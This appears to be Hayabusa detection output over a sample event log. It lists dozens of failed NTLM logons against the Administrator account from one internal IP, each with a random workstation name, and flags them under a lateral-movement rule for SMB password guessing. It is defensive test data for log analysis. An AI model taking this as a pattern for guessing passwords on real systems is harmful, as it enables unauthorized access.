2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7SUyYbLPfPAGUfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7clwftf7R0uNbqJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IsIyPcMAPnlxJa12 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CKcyo1Ec4rs3Z2g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZlzKvZLO8CDotkbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyRpYYtmD8389Yvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t3Pg0H9Gncoyr45m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zksaaJ7Z1wuy4PMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WdYAEdfWxLdM1rh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VyYFJRy0cxPfqDFh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv2Lz1h1bG6UatVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FLKPLfEe3PpEzRNc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJWv7ggzCSyEznOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZUtR9CNfKMHQMd7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6fYNHuRTqi15cRkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DvxZHwJwrBYXlEyv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jscJTJjhKvCtDl8q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZEIEjcimMyHWUsp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 30OdVRH9ZATLezsR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJ1OSBVZHKmyOzj8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JanG6Q0oYpTdm9mC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PWCwDYL3T7TAdb0J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRdyZaio1HjUKlNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VjiRnExy9TzZTG0R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztUyQpl8c9RoAr1j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jC23QAFM07q7cfVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TSM8lmdOFoDslQNa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sGZaUGAT1oXmnGLB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMNo21pTA67pb7Go : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiTZCqK3m4icL1Vi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZaZ2mnoihX1Ec4di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ihm9zaXkmWklXk4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yLIZ3tlw9VlQmK28 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GVHzJHTi55NbxXYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1FROeEnMLna2fTTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pio6ZZ9pV0pS2Whi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h1aD2w5U5K9ND5HV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zF8Jb4GpG4D3xn9i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edv4GwGfL156V1xe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Irvneva9RFn44iII : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dHtJFI8OL9kJylL5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F5Q4h62T77hGjhKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdSALwo9td9xUeBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1kYfoqz1r1NuEn04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7X400gufqdunUa8j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lLR8z7g0GY8r7a1r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHMztrxiKBGtNqkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eBQevVhmZs5gHFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lyQCs0PG6fGzpidu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnsPjnCieyoFIbJZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ku6mjVaG1lCJrAo1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VwiyVIWHOGuHzhdO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92v1rXcj5c0Lt3OF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yO2JYd6FfM2Y7px9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ltr5g8ZWUAdrPKxg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fjiPMy5uOTbbmaQ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HDRVOzxca9wDJziV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DV28RjUK26Je2Dr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seoetT43w0S3FEss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IdIU9Q9Ig4Bd3Aps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGzuHSHT59Qnp5jI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPA1J7aQrZ064WSf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhLFXDMUKGfdoc4S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: apVAhc6o3dhLmUll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYMdQeB4ZpFm8xDh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QewW1ISqRdXwtSXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SFhBcgZfc9VZ5S8S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a4ZSRW7F65yDNbJd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HrbzGNYIbjErVtDR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eFcGaL3asLVIF08d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dhJvIM5PzA9U6GTD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYrfD15TPp8OuST4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8d4CbZSTHhl7fRfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IItrtl1h3PsKviaQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVeoptuwLNKlm0V2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
